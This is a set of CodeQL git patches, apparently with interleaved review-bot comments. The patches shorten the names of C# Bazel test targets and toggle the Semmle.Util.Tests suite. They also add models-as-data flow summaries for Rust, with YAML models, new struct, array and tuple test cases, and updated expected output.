@@ -5,7 +5,7 @@ load( codeql_xunit_test( # short name as we run into long path limitations on Windows - name = "t", + name = "acpt", srcs = glob([ "*.cs", ]), diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel index 5a4d49c88fd..96ecccc31aa 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel @@ -10,7 +10,7 @@ codeql_csharp_library( "SourceGenerators/**/*.cs", ]), allow_unsafe_blocks = True, - internals_visible_to = ["t"], + internals_visible_to = ["et"], visibility = ["//csharp:__subpackages__"], deps = [ "//csharp/extractor/Semmle.Extraction.CSharp", diff --git a/csharp/extractor/Semmle.Extraction.CSharp.StubGenerator/BUILD.bazel b/csharp/extractor/Semmle.Extraction.CSharp.StubGenerator/BUILD.bazel index e3d0533a776..a2c5a0c1c54 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.StubGenerator/BUILD.bazel +++ b/csharp/extractor/Semmle.Extraction.CSharp.StubGenerator/BUILD.bazel @@ -8,7 +8,7 @@ codeql_csharp_library( srcs = glob([ "*.cs", ]), - internals_visible_to = ["t"], + internals_visible_to = ["et"], visibility = ["//csharp:__subpackages__"], deps = [ "//csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching", diff --git a/csharp/extractor/Semmle.Extraction.Tests/BUILD.bazel b/csharp/extractor/Semmle.Extraction.Tests/BUILD.bazel index 4671fa33bb3..4d13f7f4fb8 100644 --- a/csharp/extractor/Semmle.Extraction.Tests/BUILD.bazel +++ b/csharp/extractor/Semmle.Extraction.Tests/BUILD.bazel @@ -5,7 +5,7 @@ load( codeql_xunit_test( # short name as we run into long path limitations on Windows - name = "t", + name = "et", srcs = glob([ "*.cs", ]), diff --git a/csharp/extractor/Semmle.Util.Tests/BUILD.bazel b/csharp/extractor/Semmle.Util.Tests/BUILD.bazel index 6c3fb64e662..5fde4efdb15 100644 --- a/csharp/extractor/Semmle.Util.Tests/BUILD.bazel 
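Review bot: `internals_visible_to = ["et"]` in the DependencyFetching target (and the same line in the StubGenerator hunk) now depends on the short name chosen for the test target in Semmle.Extraction.Tests/BUILD.bazel, and nothing at this site says so. A comment such as `# "et" is //csharp/extractor/Semmle.Extraction.Tests:et; keep in sync with that target's name` would stop a later rename from silently breaking friend access. Assuming the assembly name follows the target name, a two-letter friend name is also easy to collide with, so it is worth confirming that no other target in the workspace produces an assembly called `et`.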
+++ b/csharp/extractor/Semmle.Util.Tests/BUILD.bazel @@ -4,7 +4,8 @@ load( ) codeql_xunit_test( - name = "Semmle.Util.Tests", + # short name as we run into long path limitations on Windows + name = "ut", srcs = glob([ "*.cs", ]), From 798b86f6afc7905277e5dbaff4e8edaa15150e85 Mon Sep 17 00:00:00 2001 From: Cornelius Riemenschneider Date: Mon, 9 Dec 2024 12:26:15 +0100 Subject: [PATCH 0920/1267] Disable semmle.util.tests again. --- csharp/BUILD.bazel | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/csharp/BUILD.bazel b/csharp/BUILD.bazel index 8aaa0d492ef..49293c27095 100644 --- a/csharp/BUILD.bazel +++ b/csharp/BUILD.bazel @@ -77,6 +77,7 @@ test_suite( "//csharp/autobuilder/Semmle.Autobuild.CSharp.Tests:acst", "//csharp/autobuilder/Semmle.Autobuild.Cpp.Tests:acpt", "//csharp/extractor/Semmle.Extraction.Tests:et", - "//csharp/extractor/Semmle.Util.Tests:ut", + # this test suite currently fails, disable for now + # "//csharp/extractor/Semmle.Util.Tests:ut", ], ) From baa248ce652dda9d6d06d3e272bdd998fdf0ae98 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 9 Dec 2024 13:00:52 +0100 Subject: [PATCH 0921/1267] C#: Enable Semmle.Util.Tests. --- csharp/BUILD.bazel | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/csharp/BUILD.bazel b/csharp/BUILD.bazel index 49293c27095..8aaa0d492ef 100644 --- a/csharp/BUILD.bazel +++ b/csharp/BUILD.bazel @@ -77,7 +77,6 @@ test_suite( "//csharp/autobuilder/Semmle.Autobuild.CSharp.Tests:acst", "//csharp/autobuilder/Semmle.Autobuild.Cpp.Tests:acpt", "//csharp/extractor/Semmle.Extraction.Tests:et", - # this test suite currently fails, disable for now - # "//csharp/extractor/Semmle.Util.Tests:ut", + "//csharp/extractor/Semmle.Util.Tests:ut", ], ) From 2f8b04b225bcba82eaa7a2b22bcbe8b875bf5b8f Mon Sep 17 00:00:00 2001 
From: Tom Hvitved Date: Thu, 5 Dec 2024 14:41:43 +0100 Subject: [PATCH 0922/1267] Rust: Models-as-data for flow summaries --- .../lib/codeql/rust/dataflow/FlowSummary.qll | 14 +- .../rust/dataflow/internal/DataFlowImpl.qll | 4 +- .../dataflow/internal/FlowSummaryImpl.qll | 16 +++ .../rust/dataflow/internal/ModelsAsData.qll | 98 +++++++++++++ .../rust/dataflow/internal/empty.model.yml | 17 +++ .../frameworks/stdlib/lang-core.model.yml | 6 + rust/ql/lib/qlpack.yml | 2 + .../dataflow/local/inline-flow.expected | 3 +- .../library-tests/dataflow/models/main.rs | 91 ++++++++++++ .../dataflow/models/models.expected | 129 ++++++++++++++++-- .../dataflow/models/models.ext.yml | 17 +++ .../library-tests/dataflow/models/models.ql | 60 -------- .../security/CWE-089/SqlInjection.qlref | 4 +- rust/ql/test/utils/InlineFlowTest.qll | 3 +- rust/ql/test/utils/PrettyPrintModels.ql | 7 + rust/ql/test/utils/ProvenancePathGraph.qll | 8 ++ 16 files changed, 392 insertions(+), 87 deletions(-) create mode 100644 rust/ql/lib/codeql/rust/dataflow/internal/ModelsAsData.qll create mode 100644 rust/ql/lib/codeql/rust/dataflow/internal/empty.model.yml create mode 100644 rust/ql/lib/codeql/rust/frameworks/stdlib/lang-core.model.yml create mode 100644 rust/ql/test/library-tests/dataflow/models/models.ext.yml create mode 100644 rust/ql/test/utils/PrettyPrintModels.ql create mode 100644 rust/ql/test/utils/ProvenancePathGraph.qll diff --git a/rust/ql/lib/codeql/rust/dataflow/FlowSummary.qll b/rust/ql/lib/codeql/rust/dataflow/FlowSummary.qll index f0457c960ce..d1ba69ba22d 100644 --- a/rust/ql/lib/codeql/rust/dataflow/FlowSummary.qll +++ b/rust/ql/lib/codeql/rust/dataflow/FlowSummary.qll 
@@ -7,17 +7,7 @@ private import codeql.rust.elements.internal.CallExprBaseImpl::Impl as CallExprB // import all instances below private module Summaries { private import codeql.rust.Frameworks - - // TODO: Use models-as-data when it's available - private class UnwrapSummary extends SummarizedCallable::Range { - UnwrapSummary() { this = "lang:core::_::::unwrap" } - - override predicate propagatesFlow(string input, string output, boolean preservesValue) { - input = "Argument[self].Variant[crate::option::Option::Some(0)]" and - output = "ReturnValue" and - preservesValue = true - } - } + private import codeql.rust.dataflow.internal.ModelsAsData } /** Provides the `Range` class used to define the extent of `LibraryCallable`. */ @@ -62,7 +52,7 @@ module SummarizedCallable { * * `preservesValue` indicates whether this is a value-preserving step or a taint-step. */ - abstract predicate propagatesFlow(string input, string output, boolean preservesValue); + predicate propagatesFlow(string input, string output, boolean preservesValue) { none() } } } diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll index 80fb80e7dc6..068429ce09b 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll @@ -597,7 +597,7 @@ private class VariantFieldContent extends VariantContent, TVariantFieldContent { } /** A canonical path pointing to a struct. */ -private class StructCanonicalPath extends MkStructCanonicalPath { +class StructCanonicalPath extends MkStructCanonicalPath { CrateOriginOption crate; string path; 
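Review bot: In the second hunk, `propagatesFlow(string input, string output, boolean preservesValue)` changes from `abstract` to a default body of `none()`, so a `Range` subclass that overrides nothing is now accepted and silently contributes no flow. The QLDoc above it should say what implementers are expected to override, for example by adding `Override either this predicate or the four-argument variant that also reports a model.` The four-argument variant is inferred from the override in ModelsAsData.qll; the rest of the class is outside the hunk.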
@@ -606,6 +606,8 @@ private class StructCanonicalPath extends MkStructCanonicalPath { /** Gets the underlying struct. */ Struct getStruct() { hasExtendedCanonicalPath(result, crate, path) } + string getExtendedCanonicalPath() { result = path } + string toString() { result = this.getStruct().getName().getText() } Location getLocation() { result = this.getStruct().getLocation() } diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/FlowSummaryImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/FlowSummaryImpl.qll index 3503ad07332..492764b3cf5 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/FlowSummaryImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/FlowSummaryImpl.qll @@ -32,6 +32,22 @@ module Input implements InputSig { arg = v.getExtendedCanonicalPath() + "::" + field ) ) + or + exists(StructCanonicalPath s, string field | + result = "Struct" and + c = TStructFieldContent(s, field) and + arg = s.getExtendedCanonicalPath() + "::" + field + ) + or + result = "ArrayElement" and + c = TArrayElement() and + arg = "" + or + exists(int pos | + result = "Tuple" and + c = TTuplePositionContent(pos) and + arg = pos.toString() + ) ) } diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/ModelsAsData.qll b/rust/ql/lib/codeql/rust/dataflow/internal/ModelsAsData.qll new file mode 100644 index 00000000000..ebffe41a185 --- /dev/null +++ b/rust/ql/lib/codeql/rust/dataflow/internal/ModelsAsData.qll 
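Review bot: `string getExtendedCanonicalPath() { result = path }` is added without QLDoc in the same change that drops `private` from `StructCanonicalPath`, so it becomes an undocumented public member. Suggest `/** Gets the extended canonical path of the underlying struct. */` above it, matching the QLDoc on `getStruct()`. The new `Struct` branch in FlowSummaryImpl.qll builds its access-path argument from this value, so this doc is where model authors learn what goes inside `Struct[...]`. The class body continues outside the hunk.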
@@ -0,0 +1,98 @@ +/** + * Defines extensible predicates for contributing library models from data extensions. + */ + +private import rust +private import codeql.rust.dataflow.FlowSummary + +/** + * Holds if in a call to the function with canonical path `path`, defined in the + * crate `crate`, the value referred to by `output` is a flow source of the given + * `kind`. + * + * `output = "ReturnValue"` simply means the result of the call itself. + * + * The following kinds are supported: + * + * - `remote`: a general remote flow source. + */ +extensible predicate sourceModel( + string crate, string path, string output, string kind, string provenance, + QlBuiltins::ExtensionId madId +); + +/** + * Holds if in a call to the function with canonical path `path`, defined in the + * crate `crate`, the value referred to by `input` is a flow sink of the given + * `kind`. + * + * For example, `input = Argument[0]` means the first argument of the call. + * + * The following kinds are supported: + * + * - `sql-injection`: a flow sink for SQL injection. + */ +extensible predicate sinkModel( + string crate, string path, string input, string kind, string provenance, + QlBuiltins::ExtensionId madId +); + +/** + * Holds if in a call to the function with canonical path `path`, defined in the + * crate `crate`, the value referred to by `input` can flow to the value referred + * to by `output`. + * + * `kind` should be either `value` or `taint`, for value-preserving or taint-preserving + * steps, respectively. + */ +extensible predicate summaryModel( + string crate, string path, string input, string output, string kind, string provenance, + QlBuiltins::ExtensionId madId +); + +/** + * Holds if the given extension tuple `madId` should pretty-print as `model`. + * + * This predicate should only be used in tests. 
+ */ +predicate interpretModelForTest(QlBuiltins::ExtensionId madId, string model) { + exists(string crate, string path, string output, string kind | + sourceModel(crate, path, kind, output, _, madId) and + model = "Source: " + crate + "; " + path + "; " + output + "; " + kind + ) + or + exists(string crate, string path, string input, string kind | + sinkModel(crate, path, kind, input, _, madId) and + model = "Sink: " + crate + "; " + path + "; " + input + "; " + kind + ) + or + exists(string type, string path, string input, string output, string kind | + summaryModel(type, path, input, output, kind, _, madId) and + model = "Summary: " + type + "; " + path + "; " + input + "; " + output + "; " + kind + ) +} + +private class SummarizedCallableFromModel extends SummarizedCallable::Range { + private string crate; + private string path; + + SummarizedCallableFromModel() { + summaryModel(crate, path, _, _, _, _, _) and + this = crate + "::_::" + path + } + + override predicate propagatesFlow( + string input, string output, boolean preservesValue, string model + ) { + exists(string kind, QlBuiltins::ExtensionId madId | + summaryModel(crate, path, input, output, kind, _, madId) and + model = "MaD:" + madId.toString() + | + kind = "value" and + preservesValue = true + or + kind = "taint" and + preservesValue = false + ) + } +} diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/empty.model.yml b/rust/ql/lib/codeql/rust/dataflow/internal/empty.model.yml new file mode 100644 index 00000000000..1a33951dfc3 --- /dev/null +++ b/rust/ql/lib/codeql/rust/dataflow/internal/empty.model.yml @@ -0,0 +1,17 @@ +extensions: + # Make sure that the extensible model predicates have at least one definition + # to avoid errors about undefined extensionals. + - addsTo: + pack: codeql/rust-all + extensible: sourceModel + data: [] + + - addsTo: + pack: codeql/rust-all + extensible: sinkModel + data: [] + + - addsTo: + pack: codeql/rust-all + extensible: summaryModel + data: [] 
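Review bot: In `interpretModelForTest`, the source and sink branches pass their columns in a different order from the one the extensible predicates declare: `sourceModel(crate, path, kind, output, _, madId)` and `sinkModel(crate, path, kind, input, _, madId)`, while the declarations take `output`/`input` before `kind`. The local named `kind` is therefore bound to the access path and the other local to the kind, so the pretty-printed string lists the kind before the access path. Use `sourceModel(crate, path, output, kind, _, madId)` and `sinkModel(crate, path, input, kind, _, madId)`. The summary branch has the right order, although its first variable is called `type` where the declaration says `crate`.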
diff --git a/rust/ql/lib/codeql/rust/frameworks/stdlib/lang-core.model.yml b/rust/ql/lib/codeql/rust/frameworks/stdlib/lang-core.model.yml new file mode 100644 index 00000000000..db61e6c70b5 --- /dev/null +++ b/rust/ql/lib/codeql/rust/frameworks/stdlib/lang-core.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/rust-all + extensible: summaryModel + data: + - ["lang:core", "::unwrap", "Argument[self].Variant[crate::option::Option::Some(0)]", "ReturnValue", "value", "manual"] diff --git a/rust/ql/lib/qlpack.yml b/rust/ql/lib/qlpack.yml index 53ccf6dfced..181e992287c 100644 --- a/rust/ql/lib/qlpack.yml +++ b/rust/ql/lib/qlpack.yml @@ -13,4 +13,6 @@ dependencies: codeql/ssa: ${workspace} codeql/tutorial: ${workspace} codeql/util: ${workspace} +dataExtensions: + - /**/*.model.yml warnOnImplicitThis: true diff --git a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected index 9ee2f23f08c..d464f562581 100644 --- a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected @@ -1,4 +1,5 @@ models +| 1 | Summary: lang:core; ::unwrap; Argument[self].Variant[crate::option::Option::Some(0)]; ReturnValue; value | edges | main.rs:19:13:19:21 | source(...) | main.rs:20:10:20:10 | s | provenance | | | main.rs:24:13:24:21 | source(...) | main.rs:27:10:27:10 | c | provenance | | 
@@ -35,7 +36,7 @@ edges | main.rs:214:14:214:14 | n | main.rs:214:25:214:25 | n | provenance | | | main.rs:224:14:224:29 | Some(...) [Some] | main.rs:225:10:225:11 | s1 [Some] | provenance | | | main.rs:224:19:224:28 | source(...) | main.rs:224:14:224:29 | Some(...) [Some] | provenance | | -| main.rs:225:10:225:11 | s1 [Some] | main.rs:225:10:225:20 | s1.unwrap(...) | provenance | | +| main.rs:225:10:225:11 | s1 [Some] | main.rs:225:10:225:20 | s1.unwrap(...) | provenance | MaD:1 | | main.rs:229:14:229:29 | Some(...) [Some] | main.rs:231:14:231:15 | s1 [Some] | provenance | | | main.rs:229:19:229:28 | source(...) | main.rs:229:14:229:29 | Some(...) [Some] | provenance | | | main.rs:231:14:231:15 | s1 [Some] | main.rs:231:14:231:16 | TryExpr | provenance | | diff --git a/rust/ql/test/library-tests/dataflow/models/main.rs b/rust/ql/test/library-tests/dataflow/models/main.rs index 337cec5a220..dbff546732a 100644 --- a/rust/ql/test/library-tests/dataflow/models/main.rs +++ b/rust/ql/test/library-tests/dataflow/models/main.rs 
@@ -90,11 +90,102 @@ fn test_set_var_field() { } } +struct MyStruct { + field1: i64, + field2: i64, +} + +// has a flow model +fn get_struct_field(s: MyStruct) -> i64 { + 0 +} + +fn test_get_struct_field() { + let s = source(6); + let my_struct = MyStruct { + field1: s, + field2: 0, + }; + sink(get_struct_field(my_struct)); // $ hasValueFlow=6 + let my_struct2 = MyStruct { + field1: 0, + field2: s, + }; + sink(get_struct_field(my_struct2)); +} + +// has a flow model +fn set_struct_field(i: i64) -> MyStruct { + MyStruct { + field1: 0, + field2: 1, + } +} + +fn test_set_struct_field() { + let s = source(7); + let my_struct = set_struct_field(s); + sink(my_struct.field1); + sink(my_struct.field2); // $ MISSING: hasValueFlow=7 +} + +// has a flow model +fn get_array_element(a: [i64; 1]) -> i64 { + 0 +} + +fn test_get_array_element() { + let s = source(8); + sink(get_array_element([s])); // $ hasValueFlow=8 +} + +// has a flow model +fn set_array_element(i: i64) -> [i64; 1] { + [0] +} + +fn test_set_array_element() { + let s = source(9); + let arr = set_array_element(s); + sink(arr[0]); // $ hasValueFlow=9 +} + +// has a flow model +fn get_tuple_element(a: (i64, i64)) -> i64 { + 0 +} + +fn test_get_tuple_element() { + let s = source(10); + let t = (s, 0); + sink(get_tuple_element(t)); // $ hasValueFlow=10 + let t = (0, s); + sink(get_tuple_element(t)); +} + +// has a flow model +fn set_tuple_element(i: i64) -> (i64, i64) { + (0, 1) +} + +fn test_set_tuple_element() { + let s = source(11); + let t = set_tuple_element(s); + sink(t.0); + sink(t.1); // $ hasValueFlow=11 +} + fn main() { test_identify(); test_get_var_pos(); test_set_var_pos(); test_get_var_field(); test_set_var_field(); + test_get_struct_field(); + test_set_struct_field(); + test_get_array_element(); + test_set_array_element(); + test_get_tuple_element(); + test_set_tuple_element(); let dummy = Some(0); // ensure that the the `lang:core` crate is extracted } 
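Review bot: `sink(my_struct.field2); // $ MISSING: hasValueFlow=7` in `test_set_struct_field` records a known gap without saying why. The `models` list in models.expected has no `set_struct_field` entry, while the array and tuple setters each have one. Add a short comment next to the annotation, e.g. `// TODO: summaries that write a struct field on ReturnValue are not applied yet`, so the annotation is not mistaken for a broken test. That wording is a guess, because the model itself lives in models.ext.yml, which is cut off on this page.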
diff --git a/rust/ql/test/library-tests/dataflow/models/models.expected b/rust/ql/test/library-tests/dataflow/models/models.expected index 6ebc72099ca..5b0d5c1588e 100644 --- a/rust/ql/test/library-tests/dataflow/models/models.expected +++ b/rust/ql/test/library-tests/dataflow/models/models.expected 
@@ -1,25 +1,36 @@ models +| 1 | Summary: repo::test; crate::coerce; Argument[0]; ReturnValue; taint | +| 2 | Summary: repo::test; crate::get_array_element; Argument[0].ArrayElement; ReturnValue; value | +| 3 | Summary: repo::test; crate::get_struct_field; Argument[0].Struct[crate::MyStruct::field1]; ReturnValue; value | +| 4 | Summary: repo::test; crate::get_tuple_element; Argument[0].Tuple[0]; ReturnValue; value | +| 5 | Summary: repo::test; crate::get_var_field; Argument[0].Variant[crate::MyFieldEnum::C::field_c]; ReturnValue; value | +| 6 | Summary: repo::test; crate::get_var_pos; Argument[0].Variant[crate::MyPosEnum::A(0)]; ReturnValue; value | +| 7 | Summary: repo::test; crate::identity; Argument[0]; ReturnValue; value | +| 8 | Summary: repo::test; crate::set_array_element; Argument[0]; ReturnValue.ArrayElement; value | +| 9 | Summary: repo::test; crate::set_tuple_element; Argument[0]; ReturnValue.Tuple[1]; value | +| 10 | Summary: repo::test; crate::set_var_field; Argument[0]; ReturnValue.Variant[crate::MyFieldEnum::D::field_d]; value | +| 11 | Summary: repo::test; crate::set_var_pos; Argument[0]; ReturnValue.Variant[crate::MyPosEnum::B(0)]; value | edges | main.rs:15:13:15:21 | source(...) | main.rs:16:19:16:19 | s | provenance | | | main.rs:15:13:15:21 | source(...) | main.rs:16:19:16:19 | s | provenance | | -| main.rs:16:19:16:19 | s | main.rs:16:10:16:20 | identity(...) | provenance | | -| main.rs:16:19:16:19 | s | main.rs:16:10:16:20 | identity(...) | provenance | | +| main.rs:16:19:16:19 | s | main.rs:16:10:16:20 | identity(...) | provenance | MaD:7 | +| main.rs:16:19:16:19 | s | main.rs:16:10:16:20 | identity(...) | provenance | MaD:7 | | main.rs:25:13:25:22 | source(...) | main.rs:26:17:26:17 | s | provenance | | -| main.rs:26:17:26:17 | s | main.rs:26:10:26:18 | coerce(...) | provenance | | +| main.rs:26:17:26:17 | s | main.rs:26:10:26:18 | coerce(...) | provenance | MaD:1 | | main.rs:40:13:40:21 | source(...) 
| main.rs:41:27:41:27 | s | provenance | | | main.rs:40:13:40:21 | source(...) | main.rs:41:27:41:27 | s | provenance | | | main.rs:41:14:41:28 | ...::A(...) [A] | main.rs:42:22:42:23 | e1 [A] | provenance | | | main.rs:41:14:41:28 | ...::A(...) [A] | main.rs:42:22:42:23 | e1 [A] | provenance | | | main.rs:41:27:41:27 | s | main.rs:41:14:41:28 | ...::A(...) [A] | provenance | | | main.rs:41:27:41:27 | s | main.rs:41:14:41:28 | ...::A(...) [A] | provenance | | -| main.rs:42:22:42:23 | e1 [A] | main.rs:42:10:42:24 | get_var_pos(...) | provenance | | -| main.rs:42:22:42:23 | e1 [A] | main.rs:42:10:42:24 | get_var_pos(...) | provenance | | +| main.rs:42:22:42:23 | e1 [A] | main.rs:42:10:42:24 | get_var_pos(...) | provenance | MaD:6 | +| main.rs:42:22:42:23 | e1 [A] | main.rs:42:10:42:24 | get_var_pos(...) | provenance | MaD:6 | | main.rs:53:13:53:21 | source(...) | main.rs:54:26:54:26 | s | provenance | | | main.rs:53:13:53:21 | source(...) | main.rs:54:26:54:26 | s | provenance | | | main.rs:54:14:54:27 | set_var_pos(...) [B] | main.rs:57:9:57:23 | ...::B(...) [B] | provenance | | | main.rs:54:14:54:27 | set_var_pos(...) [B] | main.rs:57:9:57:23 | ...::B(...) [B] | provenance | | -| main.rs:54:26:54:26 | s | main.rs:54:14:54:27 | set_var_pos(...) [B] | provenance | | -| main.rs:54:26:54:26 | s | main.rs:54:14:54:27 | set_var_pos(...) [B] | provenance | | +| main.rs:54:26:54:26 | s | main.rs:54:14:54:27 | set_var_pos(...) [B] | provenance | MaD:11 | +| main.rs:54:26:54:26 | s | main.rs:54:14:54:27 | set_var_pos(...) [B] | provenance | MaD:11 | | main.rs:57:9:57:23 | ...::B(...) [B] | main.rs:57:22:57:22 | i | provenance | | | main.rs:57:9:57:23 | ...::B(...) [B] | main.rs:57:22:57:22 | i | provenance | | | main.rs:57:22:57:22 | i | main.rs:57:33:57:33 | i | provenance | | 
@@ -30,18 +41,56 @@ edges | main.rs:73:14:73:42 | ...::C {...} [C] | main.rs:74:24:74:25 | e1 [C] | provenance | | | main.rs:73:40:73:40 | s | main.rs:73:14:73:42 | ...::C {...} [C] | provenance | | | main.rs:73:40:73:40 | s | main.rs:73:14:73:42 | ...::C {...} [C] | provenance | | -| main.rs:74:24:74:25 | e1 [C] | main.rs:74:10:74:26 | get_var_field(...) | provenance | | -| main.rs:74:24:74:25 | e1 [C] | main.rs:74:10:74:26 | get_var_field(...) | provenance | | +| main.rs:74:24:74:25 | e1 [C] | main.rs:74:10:74:26 | get_var_field(...) | provenance | MaD:5 | +| main.rs:74:24:74:25 | e1 [C] | main.rs:74:10:74:26 | get_var_field(...) | provenance | MaD:5 | | main.rs:85:13:85:21 | source(...) | main.rs:86:28:86:28 | s | provenance | | | main.rs:85:13:85:21 | source(...) | main.rs:86:28:86:28 | s | provenance | | | main.rs:86:14:86:29 | set_var_field(...) [D] | main.rs:89:9:89:37 | ...::D {...} [D] | provenance | | | main.rs:86:14:86:29 | set_var_field(...) [D] | main.rs:89:9:89:37 | ...::D {...} [D] | provenance | | -| main.rs:86:28:86:28 | s | main.rs:86:14:86:29 | set_var_field(...) [D] | provenance | | -| main.rs:86:28:86:28 | s | main.rs:86:14:86:29 | set_var_field(...) [D] | provenance | | +| main.rs:86:28:86:28 | s | main.rs:86:14:86:29 | set_var_field(...) [D] | provenance | MaD:10 | +| main.rs:86:28:86:28 | s | main.rs:86:14:86:29 | set_var_field(...) [D] | provenance | MaD:10 | | main.rs:89:9:89:37 | ...::D {...} [D] | main.rs:89:35:89:35 | i | provenance | | | main.rs:89:9:89:37 | ...::D {...} [D] | main.rs:89:35:89:35 | i | provenance | | | main.rs:89:35:89:35 | i | main.rs:89:47:89:47 | i | provenance | | | main.rs:89:35:89:35 | i | main.rs:89:47:89:47 | i | provenance | | +| main.rs:104:13:104:21 | source(...) | main.rs:106:17:106:17 | s | provenance | | +| main.rs:104:13:104:21 | source(...) 
| main.rs:106:17:106:17 | s | provenance | | +| main.rs:105:21:108:5 | MyStruct {...} [MyStruct.field1] | main.rs:109:27:109:35 | my_struct [MyStruct.field1] | provenance | | +| main.rs:105:21:108:5 | MyStruct {...} [MyStruct.field1] | main.rs:109:27:109:35 | my_struct [MyStruct.field1] | provenance | | +| main.rs:106:17:106:17 | s | main.rs:105:21:108:5 | MyStruct {...} [MyStruct.field1] | provenance | | +| main.rs:106:17:106:17 | s | main.rs:105:21:108:5 | MyStruct {...} [MyStruct.field1] | provenance | | +| main.rs:109:27:109:35 | my_struct [MyStruct.field1] | main.rs:109:10:109:36 | get_struct_field(...) | provenance | MaD:3 | +| main.rs:109:27:109:35 | my_struct [MyStruct.field1] | main.rs:109:10:109:36 | get_struct_field(...) | provenance | MaD:3 | +| main.rs:138:13:138:21 | source(...) | main.rs:139:29:139:29 | s | provenance | | +| main.rs:138:13:138:21 | source(...) | main.rs:139:29:139:29 | s | provenance | | +| main.rs:139:28:139:30 | [...] [array[]] | main.rs:139:10:139:31 | get_array_element(...) | provenance | MaD:2 | +| main.rs:139:28:139:30 | [...] [array[]] | main.rs:139:10:139:31 | get_array_element(...) | provenance | MaD:2 | +| main.rs:139:29:139:29 | s | main.rs:139:28:139:30 | [...] [array[]] | provenance | | +| main.rs:139:29:139:29 | s | main.rs:139:28:139:30 | [...] [array[]] | provenance | | +| main.rs:148:13:148:21 | source(...) | main.rs:149:33:149:33 | s | provenance | | +| main.rs:148:13:148:21 | source(...) | main.rs:149:33:149:33 | s | provenance | | +| main.rs:149:15:149:34 | set_array_element(...) [array[]] | main.rs:150:10:150:12 | arr [array[]] | provenance | | +| main.rs:149:15:149:34 | set_array_element(...) [array[]] | main.rs:150:10:150:12 | arr [array[]] | provenance | | +| main.rs:149:33:149:33 | s | main.rs:149:15:149:34 | set_array_element(...) [array[]] | provenance | MaD:8 | +| main.rs:149:33:149:33 | s | main.rs:149:15:149:34 | set_array_element(...) 
[array[]] | provenance | MaD:8 | +| main.rs:150:10:150:12 | arr [array[]] | main.rs:150:10:150:15 | arr[0] | provenance | | +| main.rs:150:10:150:12 | arr [array[]] | main.rs:150:10:150:15 | arr[0] | provenance | | +| main.rs:159:13:159:22 | source(...) | main.rs:160:14:160:14 | s | provenance | | +| main.rs:159:13:159:22 | source(...) | main.rs:160:14:160:14 | s | provenance | | +| main.rs:160:13:160:18 | TupleExpr [tuple.0] | main.rs:161:28:161:28 | t [tuple.0] | provenance | | +| main.rs:160:13:160:18 | TupleExpr [tuple.0] | main.rs:161:28:161:28 | t [tuple.0] | provenance | | +| main.rs:160:14:160:14 | s | main.rs:160:13:160:18 | TupleExpr [tuple.0] | provenance | | +| main.rs:160:14:160:14 | s | main.rs:160:13:160:18 | TupleExpr [tuple.0] | provenance | | +| main.rs:161:28:161:28 | t [tuple.0] | main.rs:161:10:161:29 | get_tuple_element(...) | provenance | MaD:4 | +| main.rs:161:28:161:28 | t [tuple.0] | main.rs:161:10:161:29 | get_tuple_element(...) | provenance | MaD:4 | +| main.rs:172:13:172:22 | source(...) | main.rs:173:31:173:31 | s | provenance | | +| main.rs:172:13:172:22 | source(...) | main.rs:173:31:173:31 | s | provenance | | +| main.rs:173:13:173:32 | set_tuple_element(...) [tuple.1] | main.rs:175:10:175:10 | t [tuple.1] | provenance | | +| main.rs:173:13:173:32 | set_tuple_element(...) [tuple.1] | main.rs:175:10:175:10 | t [tuple.1] | provenance | | +| main.rs:173:31:173:31 | s | main.rs:173:13:173:32 | set_tuple_element(...) [tuple.1] | provenance | MaD:9 | +| main.rs:173:31:173:31 | s | main.rs:173:13:173:32 | set_tuple_element(...) [tuple.1] | provenance | MaD:9 | +| main.rs:175:10:175:10 | t [tuple.1] | main.rs:175:10:175:12 | t.1 | provenance | | +| main.rs:175:10:175:10 | t [tuple.1] | main.rs:175:10:175:12 | t.1 | provenance | | nodes | main.rs:15:13:15:21 | source(...) | semmle.label | source(...) | | main.rs:15:13:15:21 | source(...) | semmle.label | source(...) | 
@@ -96,6 +145,54 @@ nodes | main.rs:89:35:89:35 | i | semmle.label | i | | main.rs:89:47:89:47 | i | semmle.label | i | | main.rs:89:47:89:47 | i | semmle.label | i | +| main.rs:104:13:104:21 | source(...) | semmle.label | source(...) | +| main.rs:104:13:104:21 | source(...) | semmle.label | source(...) | +| main.rs:105:21:108:5 | MyStruct {...} [MyStruct.field1] | semmle.label | MyStruct {...} [MyStruct.field1] | +| main.rs:105:21:108:5 | MyStruct {...} [MyStruct.field1] | semmle.label | MyStruct {...} [MyStruct.field1] | +| main.rs:106:17:106:17 | s | semmle.label | s | +| main.rs:106:17:106:17 | s | semmle.label | s | +| main.rs:109:10:109:36 | get_struct_field(...) | semmle.label | get_struct_field(...) | +| main.rs:109:10:109:36 | get_struct_field(...) | semmle.label | get_struct_field(...) | +| main.rs:109:27:109:35 | my_struct [MyStruct.field1] | semmle.label | my_struct [MyStruct.field1] | +| main.rs:109:27:109:35 | my_struct [MyStruct.field1] | semmle.label | my_struct [MyStruct.field1] | +| main.rs:138:13:138:21 | source(...) | semmle.label | source(...) | +| main.rs:138:13:138:21 | source(...) | semmle.label | source(...) 